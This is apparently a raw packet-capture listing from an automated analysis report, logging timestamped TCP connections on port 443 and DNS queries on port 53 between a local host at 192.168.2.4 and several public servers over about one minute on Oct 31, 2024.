                                                  Oct 31, 2024 20:49:42.298190117 CET44349738104.18.11.207192.168.2.4
                                                  Oct 31, 2024 20:49:42.298223019 CET49738443192.168.2.4104.18.11.207
                                                  Oct 31, 2024 20:49:42.339159966 CET44349738104.18.11.207192.168.2.4
                                                  Oct 31, 2024 20:49:42.339225054 CET49738443192.168.2.4104.18.11.207
                                                  Oct 31, 2024 20:49:42.339673042 CET44349738104.18.11.207192.168.2.4
                                                  Oct 31, 2024 20:49:42.339730024 CET49738443192.168.2.4104.18.11.207
                                                  Oct 31, 2024 20:49:42.340255022 CET44349738104.18.11.207192.168.2.4
                                                  Oct 31, 2024 20:49:42.340311050 CET49738443192.168.2.4104.18.11.207
                                                  Oct 31, 2024 20:49:42.416879892 CET44349738104.18.11.207192.168.2.4
                                                  Oct 31, 2024 20:49:42.416956902 CET49738443192.168.2.4104.18.11.207
                                                  Oct 31, 2024 20:49:42.458623886 CET44349738104.18.11.207192.168.2.4
                                                  Oct 31, 2024 20:49:42.458704948 CET49738443192.168.2.4104.18.11.207
                                                  Oct 31, 2024 20:49:42.459047079 CET44349738104.18.11.207192.168.2.4
                                                  Oct 31, 2024 20:49:42.459430933 CET49738443192.168.2.4104.18.11.207
                                                  Oct 31, 2024 20:49:42.459741116 CET44349738104.18.11.207192.168.2.4
                                                  Oct 31, 2024 20:49:42.459795952 CET49738443192.168.2.4104.18.11.207
                                                  Oct 31, 2024 20:49:42.460200071 CET44349738104.18.11.207192.168.2.4
                                                  Oct 31, 2024 20:49:42.460244894 CET49738443192.168.2.4104.18.11.207
                                                  Oct 31, 2024 20:49:42.536514997 CET44349738104.18.11.207192.168.2.4
                                                  Oct 31, 2024 20:49:42.536586046 CET49738443192.168.2.4104.18.11.207
                                                  Oct 31, 2024 20:49:42.577841043 CET44349738104.18.11.207192.168.2.4
                                                  Oct 31, 2024 20:49:42.577900887 CET49738443192.168.2.4104.18.11.207
                                                  Oct 31, 2024 20:49:42.578547001 CET44349738104.18.11.207192.168.2.4
                                                  Oct 31, 2024 20:49:42.578598976 CET49738443192.168.2.4104.18.11.207
                                                  Oct 31, 2024 20:49:42.579195023 CET44349738104.18.11.207192.168.2.4
                                                  Oct 31, 2024 20:49:42.579246998 CET49738443192.168.2.4104.18.11.207
                                                  Oct 31, 2024 20:49:42.587400913 CET4434974518.65.39.18192.168.2.4
                                                  Oct 31, 2024 20:49:42.587548018 CET4434974518.65.39.18192.168.2.4
                                                  Oct 31, 2024 20:49:42.587723017 CET49745443192.168.2.418.65.39.18
                                                  Oct 31, 2024 20:49:42.589616060 CET49745443192.168.2.418.65.39.18
                                                  Oct 31, 2024 20:49:42.589634895 CET4434974518.65.39.18192.168.2.4
                                                  Oct 31, 2024 20:49:42.595987082 CET4434974418.65.39.18192.168.2.4
                                                  Oct 31, 2024 20:49:42.596085072 CET4434974418.65.39.18192.168.2.4
                                                  Oct 31, 2024 20:49:42.596234083 CET49744443192.168.2.418.65.39.18
                                                  Oct 31, 2024 20:49:42.597105026 CET49744443192.168.2.418.65.39.18
                                                  Oct 31, 2024 20:49:42.597126961 CET4434974418.65.39.18192.168.2.4
                                                  Oct 31, 2024 20:49:42.599109888 CET4434974618.65.39.18192.168.2.4
                                                  Oct 31, 2024 20:49:42.599385023 CET4434974618.65.39.18192.168.2.4
                                                  Oct 31, 2024 20:49:42.599481106 CET49746443192.168.2.418.65.39.18
                                                  Oct 31, 2024 20:49:42.601494074 CET49746443192.168.2.418.65.39.18
                                                  Oct 31, 2024 20:49:42.601504087 CET4434974618.65.39.18192.168.2.4
                                                  Oct 31, 2024 20:49:42.655523062 CET44349738104.18.11.207192.168.2.4
                                                  Oct 31, 2024 20:49:42.655585051 CET49738443192.168.2.4104.18.11.207
                                                  Oct 31, 2024 20:49:42.655940056 CET44349738104.18.11.207192.168.2.4
                                                  Oct 31, 2024 20:49:42.656006098 CET49738443192.168.2.4104.18.11.207
                                                  Oct 31, 2024 20:49:42.697527885 CET44349738104.18.11.207192.168.2.4
                                                  Oct 31, 2024 20:49:42.697608948 CET49738443192.168.2.4104.18.11.207
                                                  Oct 31, 2024 20:49:42.697618961 CET44349738104.18.11.207192.168.2.4
                                                  Oct 31, 2024 20:49:42.697663069 CET49738443192.168.2.4104.18.11.207
                                                  Oct 31, 2024 20:49:42.697669029 CET44349738104.18.11.207192.168.2.4
                                                  Oct 31, 2024 20:49:42.697721004 CET44349738104.18.11.207192.168.2.4
                                                  Oct 31, 2024 20:49:42.698653936 CET49738443192.168.2.4104.18.11.207
                                                  Oct 31, 2024 20:49:42.732269049 CET49738443192.168.2.4104.18.11.207
                                                  Oct 31, 2024 20:49:42.732300997 CET44349738104.18.11.207192.168.2.4
                                                  Oct 31, 2024 20:49:43.093278885 CET49747443192.168.2.4142.250.185.100
                                                  Oct 31, 2024 20:49:43.093318939 CET44349747142.250.185.100192.168.2.4
                                                  Oct 31, 2024 20:49:43.093857050 CET49747443192.168.2.4142.250.185.100
                                                  Oct 31, 2024 20:49:43.094927073 CET49749443192.168.2.4142.250.184.228
                                                  Oct 31, 2024 20:49:43.094957113 CET44349749142.250.184.228192.168.2.4
                                                  Oct 31, 2024 20:49:43.095185995 CET49749443192.168.2.4142.250.184.228
                                                  Oct 31, 2024 20:49:43.095419884 CET49747443192.168.2.4142.250.185.100
                                                  Oct 31, 2024 20:49:43.095438004 CET44349747142.250.185.100192.168.2.4
                                                  Oct 31, 2024 20:49:43.095556021 CET49749443192.168.2.4142.250.184.228
                                                  Oct 31, 2024 20:49:43.095562935 CET44349749142.250.184.228192.168.2.4
                                                  Oct 31, 2024 20:49:43.125583887 CET49750443192.168.2.43.230.32.200
                                                  Oct 31, 2024 20:49:43.125624895 CET443497503.230.32.200192.168.2.4
                                                  Oct 31, 2024 20:49:43.125686884 CET49750443192.168.2.43.230.32.200
                                                  Oct 31, 2024 20:49:43.126043081 CET49750443192.168.2.43.230.32.200
                                                  Oct 31, 2024 20:49:43.126051903 CET443497503.230.32.200192.168.2.4
                                                  Oct 31, 2024 20:49:43.789433002 CET49751443192.168.2.4184.28.90.27
                                                  Oct 31, 2024 20:49:43.789484024 CET44349751184.28.90.27192.168.2.4
                                                  Oct 31, 2024 20:49:43.789557934 CET49751443192.168.2.4184.28.90.27
                                                  Oct 31, 2024 20:49:43.793399096 CET49751443192.168.2.4184.28.90.27
                                                  Oct 31, 2024 20:49:43.793414116 CET44349751184.28.90.27192.168.2.4
                                                  Oct 31, 2024 20:49:43.968162060 CET44349749142.250.184.228192.168.2.4
                                                  Oct 31, 2024 20:49:43.980514050 CET443497503.230.32.200192.168.2.4
                                                  Oct 31, 2024 20:49:44.006858110 CET44349747142.250.185.100192.168.2.4
                                                  Oct 31, 2024 20:49:44.020603895 CET49749443192.168.2.4142.250.184.228
                                                  Oct 31, 2024 20:49:44.020843983 CET49750443192.168.2.43.230.32.200
                                                  Oct 31, 2024 20:49:44.059931040 CET49747443192.168.2.4142.250.185.100
                                                  Oct 31, 2024 20:49:44.060633898 CET49749443192.168.2.4142.250.184.228
                                                  Oct 31, 2024 20:49:44.060661077 CET44349749142.250.184.228192.168.2.4
                                                  Oct 31, 2024 20:49:44.060915947 CET49750443192.168.2.43.230.32.200
                                                  Oct 31, 2024 20:49:44.060930967 CET443497503.230.32.200192.168.2.4
                                                  Oct 31, 2024 20:49:44.061036110 CET49747443192.168.2.4142.250.185.100
                                                  Oct 31, 2024 20:49:44.061039925 CET44349747142.250.185.100192.168.2.4
                                                  Oct 31, 2024 20:49:44.061943054 CET44349749142.250.184.228192.168.2.4
                                                  Oct 31, 2024 20:49:44.061959028 CET44349749142.250.184.228192.168.2.4
                                                  Oct 31, 2024 20:49:44.062020063 CET49749443192.168.2.4142.250.184.228
                                                  Oct 31, 2024 20:49:44.062093019 CET443497503.230.32.200192.168.2.4
                                                  Oct 31, 2024 20:49:44.062140942 CET49750443192.168.2.43.230.32.200
                                                  Oct 31, 2024 20:49:44.063158035 CET44349747142.250.185.100192.168.2.4
                                                  Oct 31, 2024 20:49:44.063167095 CET44349747142.250.185.100192.168.2.4
                                                  Oct 31, 2024 20:49:44.063203096 CET49747443192.168.2.4142.250.185.100
                                                  Oct 31, 2024 20:49:44.538167953 CET49749443192.168.2.4142.250.184.228
                                                  Oct 31, 2024 20:49:44.538300037 CET49747443192.168.2.4142.250.185.100
                                                  Oct 31, 2024 20:49:44.538494110 CET49747443192.168.2.4142.250.185.100
                                                  Oct 31, 2024 20:49:44.538500071 CET44349747142.250.185.100192.168.2.4
                                                  Oct 31, 2024 20:49:44.538500071 CET44349749142.250.184.228192.168.2.4
                                                  Oct 31, 2024 20:49:44.538707018 CET49750443192.168.2.43.230.32.200
                                                  Oct 31, 2024 20:49:44.538774967 CET443497503.230.32.200192.168.2.4
                                                  Oct 31, 2024 20:49:44.538976908 CET49750443192.168.2.43.230.32.200
                                                  Oct 31, 2024 20:49:44.583328962 CET443497503.230.32.200192.168.2.4
                                                  Oct 31, 2024 20:49:44.583332062 CET44349747142.250.185.100192.168.2.4
                                                  Oct 31, 2024 20:49:44.606647968 CET49749443192.168.2.4142.250.184.228
                                                  Oct 31, 2024 20:49:44.606657982 CET49747443192.168.2.4142.250.185.100
                                                  Oct 31, 2024 20:49:44.606673956 CET44349749142.250.184.228192.168.2.4
                                                  Oct 31, 2024 20:49:44.606687069 CET44349747142.250.185.100192.168.2.4
                                                  Oct 31, 2024 20:49:44.606703997 CET49750443192.168.2.43.230.32.200
                                                  Oct 31, 2024 20:49:44.606714010 CET443497503.230.32.200192.168.2.4
                                                  Oct 31, 2024 20:49:44.684730053 CET44349751184.28.90.27192.168.2.4
                                                  Oct 31, 2024 20:49:44.684807062 CET49751443192.168.2.4184.28.90.27
                                                  Oct 31, 2024 20:49:44.744693995 CET49749443192.168.2.4142.250.184.228
                                                  Oct 31, 2024 20:49:44.744709015 CET49747443192.168.2.4142.250.185.100
                                                  Oct 31, 2024 20:49:44.744709015 CET49750443192.168.2.43.230.32.200
                                                  Oct 31, 2024 20:49:44.744740009 CET443497503.230.32.200192.168.2.4
                                                  Oct 31, 2024 20:49:44.799997091 CET443497503.230.32.200192.168.2.4
                                                  Oct 31, 2024 20:49:44.800018072 CET443497503.230.32.200192.168.2.4
                                                  Oct 31, 2024 20:49:44.800049067 CET443497503.230.32.200192.168.2.4
                                                  Oct 31, 2024 20:49:44.800055027 CET49750443192.168.2.43.230.32.200
                                                  Oct 31, 2024 20:49:44.800077915 CET443497503.230.32.200192.168.2.4
                                                  Oct 31, 2024 20:49:44.800098896 CET49750443192.168.2.43.230.32.200
                                                  Oct 31, 2024 20:49:44.804728985 CET44349747142.250.185.100192.168.2.4
                                                  Oct 31, 2024 20:49:44.847943068 CET49750443192.168.2.43.230.32.200
                                                  Oct 31, 2024 20:49:44.847943068 CET49747443192.168.2.4142.250.185.100
                                                  Oct 31, 2024 20:49:44.847970963 CET44349747142.250.185.100192.168.2.4
                                                  Oct 31, 2024 20:49:44.857189894 CET443497503.230.32.200192.168.2.4
                                                  Oct 31, 2024 20:49:44.857198000 CET443497503.230.32.200192.168.2.4
                                                  Oct 31, 2024 20:49:44.857248068 CET49750443192.168.2.43.230.32.200
                                                  Oct 31, 2024 20:49:44.874510050 CET49751443192.168.2.4184.28.90.27
                                                  Oct 31, 2024 20:49:44.874524117 CET44349751184.28.90.27192.168.2.4
                                                  Oct 31, 2024 20:49:44.874866962 CET44349751184.28.90.27192.168.2.4
                                                  Oct 31, 2024 20:49:44.920640945 CET443497503.230.32.200192.168.2.4
                                                  Oct 31, 2024 20:49:44.920650005 CET443497503.230.32.200192.168.2.4
                                                  Oct 31, 2024 20:49:44.920720100 CET49750443192.168.2.43.230.32.200
                                                  Oct 31, 2024 20:49:44.920734882 CET443497503.230.32.200192.168.2.4
                                                  Oct 31, 2024 20:49:44.920748949 CET443497503.230.32.200192.168.2.4
                                                  Oct 31, 2024 20:49:44.920798063 CET49750443192.168.2.43.230.32.200
                                                  Oct 31, 2024 20:49:44.921520948 CET49750443192.168.2.43.230.32.200
                                                  Oct 31, 2024 20:49:44.921539068 CET443497503.230.32.200192.168.2.4
                                                  Oct 31, 2024 20:49:44.923458099 CET49751443192.168.2.4184.28.90.27
                                                  Oct 31, 2024 20:49:44.938719988 CET44349747142.250.185.100192.168.2.4
                                                  Oct 31, 2024 20:49:44.938772917 CET49747443192.168.2.4142.250.185.100
                                                  Oct 31, 2024 20:49:45.535543919 CET49747443192.168.2.4142.250.185.100
                                                  Oct 31, 2024 20:49:45.535562992 CET44349747142.250.185.100192.168.2.4
                                                  Oct 31, 2024 20:49:45.535573959 CET49747443192.168.2.4142.250.185.100
                                                  Oct 31, 2024 20:49:45.535605907 CET49747443192.168.2.4142.250.185.100
                                                  Oct 31, 2024 20:49:45.949778080 CET49751443192.168.2.4184.28.90.27
                                                  Oct 31, 2024 20:49:45.995323896 CET44349751184.28.90.27192.168.2.4
                                                  Oct 31, 2024 20:49:46.417464018 CET44349751184.28.90.27192.168.2.4
                                                  Oct 31, 2024 20:49:46.417792082 CET44349751184.28.90.27192.168.2.4
                                                  Oct 31, 2024 20:49:46.417881012 CET49751443192.168.2.4184.28.90.27
                                                  Oct 31, 2024 20:49:46.420707941 CET49751443192.168.2.4184.28.90.27
                                                  Oct 31, 2024 20:49:46.420708895 CET49751443192.168.2.4184.28.90.27
                                                  Oct 31, 2024 20:49:46.420734882 CET44349751184.28.90.27192.168.2.4
                                                  Oct 31, 2024 20:49:46.420748949 CET44349751184.28.90.27192.168.2.4
                                                  Oct 31, 2024 20:49:46.466454983 CET49759443192.168.2.4184.28.90.27
                                                  Oct 31, 2024 20:49:46.466521978 CET44349759184.28.90.27192.168.2.4
                                                  Oct 31, 2024 20:49:46.466638088 CET49759443192.168.2.4184.28.90.27
                                                  Oct 31, 2024 20:49:46.470650911 CET49759443192.168.2.4184.28.90.27
                                                  Oct 31, 2024 20:49:46.470675945 CET44349759184.28.90.27192.168.2.4
                                                  Oct 31, 2024 20:49:47.087058067 CET49762443192.168.2.4142.250.185.100
                                                  Oct 31, 2024 20:49:47.087104082 CET44349762142.250.185.100192.168.2.4
                                                  Oct 31, 2024 20:49:47.087281942 CET49762443192.168.2.4142.250.185.100
                                                  Oct 31, 2024 20:49:47.089345932 CET49762443192.168.2.4142.250.185.100
                                                  Oct 31, 2024 20:49:47.089358091 CET44349762142.250.185.100192.168.2.4
                                                  Oct 31, 2024 20:49:47.344937086 CET44349759184.28.90.27192.168.2.4
                                                  Oct 31, 2024 20:49:47.345102072 CET49759443192.168.2.4184.28.90.27
                                                  Oct 31, 2024 20:49:47.346342087 CET49759443192.168.2.4184.28.90.27
                                                  Oct 31, 2024 20:49:47.346357107 CET44349759184.28.90.27192.168.2.4
                                                  Oct 31, 2024 20:49:47.346668959 CET44349759184.28.90.27192.168.2.4
                                                  Oct 31, 2024 20:49:47.347924948 CET49759443192.168.2.4184.28.90.27
                                                  Oct 31, 2024 20:49:47.395348072 CET44349759184.28.90.27192.168.2.4
                                                  Oct 31, 2024 20:49:47.600470066 CET44349759184.28.90.27192.168.2.4
                                                  Oct 31, 2024 20:49:47.600543976 CET44349759184.28.90.27192.168.2.4
                                                  Oct 31, 2024 20:49:47.600599051 CET49759443192.168.2.4184.28.90.27
                                                  Oct 31, 2024 20:49:47.628433943 CET49759443192.168.2.4184.28.90.27
                                                  Oct 31, 2024 20:49:47.628457069 CET44349759184.28.90.27192.168.2.4
                                                  Oct 31, 2024 20:49:47.628468990 CET49759443192.168.2.4184.28.90.27
                                                  Oct 31, 2024 20:49:47.628475904 CET44349759184.28.90.27192.168.2.4
                                                  Oct 31, 2024 20:49:47.960179090 CET44349762142.250.185.100192.168.2.4
                                                  Oct 31, 2024 20:49:47.960536003 CET49762443192.168.2.4142.250.185.100
                                                  Oct 31, 2024 20:49:47.960565090 CET44349762142.250.185.100192.168.2.4
                                                  Oct 31, 2024 20:49:47.960915089 CET44349762142.250.185.100192.168.2.4
                                                  Oct 31, 2024 20:49:47.961841106 CET49762443192.168.2.4142.250.185.100
                                                  Oct 31, 2024 20:49:47.961941004 CET44349762142.250.185.100192.168.2.4
                                                  Oct 31, 2024 20:49:47.962217093 CET49762443192.168.2.4142.250.185.100
                                                  Oct 31, 2024 20:49:48.007335901 CET44349762142.250.185.100192.168.2.4
                                                  Oct 31, 2024 20:49:48.220288038 CET44349762142.250.185.100192.168.2.4
                                                  Oct 31, 2024 20:49:48.220345974 CET44349762142.250.185.100192.168.2.4
                                                  Oct 31, 2024 20:49:48.220391989 CET49762443192.168.2.4142.250.185.100
                                                  Oct 31, 2024 20:49:48.220418930 CET44349762142.250.185.100192.168.2.4
                                                  Oct 31, 2024 20:49:48.221208096 CET49762443192.168.2.4142.250.185.100
                                                  Oct 31, 2024 20:49:48.221242905 CET44349762142.250.185.100192.168.2.4
                                                  Oct 31, 2024 20:49:48.221293926 CET49762443192.168.2.4142.250.185.100
                                                  Oct 31, 2024 20:49:53.969717979 CET44349749142.250.184.228192.168.2.4
                                                  Oct 31, 2024 20:49:53.969784975 CET44349749142.250.184.228192.168.2.4
                                                  Oct 31, 2024 20:49:53.969827890 CET49749443192.168.2.4142.250.184.228
                                                  Oct 31, 2024 20:49:54.710376978 CET49749443192.168.2.4142.250.184.228
                                                  Oct 31, 2024 20:49:54.710406065 CET44349749142.250.184.228192.168.2.4
                                                  Oct 31, 2024 20:50:02.685283899 CET5231953192.168.2.41.1.1.1
                                                  Oct 31, 2024 20:50:02.690398932 CET53523191.1.1.1192.168.2.4
                                                  Oct 31, 2024 20:50:02.690458059 CET5231953192.168.2.41.1.1.1
                                                  Oct 31, 2024 20:50:02.690525055 CET5231953192.168.2.41.1.1.1
                                                  Oct 31, 2024 20:50:02.695394039 CET53523191.1.1.1192.168.2.4
                                                  Oct 31, 2024 20:50:03.319281101 CET53523191.1.1.1192.168.2.4
                                                  Oct 31, 2024 20:50:03.344712973 CET5231953192.168.2.41.1.1.1
                                                  Oct 31, 2024 20:50:03.350615025 CET53523191.1.1.1192.168.2.4
                                                  Oct 31, 2024 20:50:03.350904942 CET5231953192.168.2.41.1.1.1
                                                  Oct 31, 2024 20:50:31.766905069 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:31.766946077 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:31.766999960 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:31.767390013 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:31.767400980 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:32.564038992 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:32.564117908 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:32.565747976 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:32.565754890 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:32.566023111 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:32.574872017 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:32.619332075 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:32.841130972 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:32.841190100 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:32.841234922 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:32.841269016 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:32.841283083 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:32.841325998 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:32.841357946 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:32.964361906 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:32.964436054 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:32.964461088 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:32.964478016 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:32.964520931 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:32.964520931 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:33.088289976 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:33.088356018 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:33.088407040 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:33.088423014 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:33.088433981 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:33.088599920 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:33.210251093 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:33.210329056 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:33.210344076 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:33.210365057 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:33.210407019 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:33.210423946 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:33.303245068 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:33.303302050 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:33.303354979 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:33.303373098 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:33.303388119 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:33.303510904 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:33.380916119 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:33.380969048 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:33.381041050 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:33.381061077 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:33.381086111 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:33.381216049 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:33.458060026 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:33.458086014 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:33.458152056 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:33.458165884 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:33.458446980 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:33.580334902 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:33.580358028 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:33.580461025 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:33.580480099 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:33.580518007 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:33.702965975 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:33.703032970 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:33.703082085 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:33.703098059 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:33.703119040 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:33.703145981 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:33.796412945 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:33.796438932 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:33.796519041 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:33.796531916 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:33.796564102 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:33.796564102 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:33.828982115 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:33.829008102 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:33.829128981 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:33.829128981 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:33.829139948 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:33.829183102 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:33.951098919 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:33.951128006 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:33.951230049 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:33.951247931 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:33.951292992 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:33.951292992 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:34.044400930 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.044435024 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.044522047 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:34.044536114 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.044572115 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:34.044610977 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:34.077342033 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.077406883 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:34.077421904 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.077434063 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.077486992 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:34.077506065 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.077517986 CET52322443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:34.077523947 CET4435232213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.165271044 CET52323443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:34.165316105 CET4435232313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.165385008 CET52323443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:34.167560101 CET52324443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:34.167617083 CET4435232413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.167747974 CET52324443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:34.169642925 CET52326443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:34.169652939 CET4435232613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.169663906 CET52325443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:34.169701099 CET4435232513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.169714928 CET52326443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:34.169749975 CET52325443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:34.170933962 CET52327443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:34.170943022 CET4435232713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.171020031 CET52327443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:34.171256065 CET52327443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:34.171269894 CET4435232713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.171338081 CET52325443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:34.171350002 CET4435232513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.171416998 CET52323443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:34.171431065 CET4435232313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.171498060 CET52324443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:34.171524048 CET4435232413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.171566010 CET52326443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:34.171576977 CET4435232613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.915328026 CET4435232513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.915899992 CET52325443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:34.915926933 CET4435232513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.917119980 CET52325443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:34.917124033 CET4435232513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.918184042 CET4435232713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.918565989 CET52327443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:34.918572903 CET4435232713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.919245005 CET52327443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:34.919249058 CET4435232713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.932483912 CET4435232313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.933156967 CET52323443192.168.2.413.107.246.60
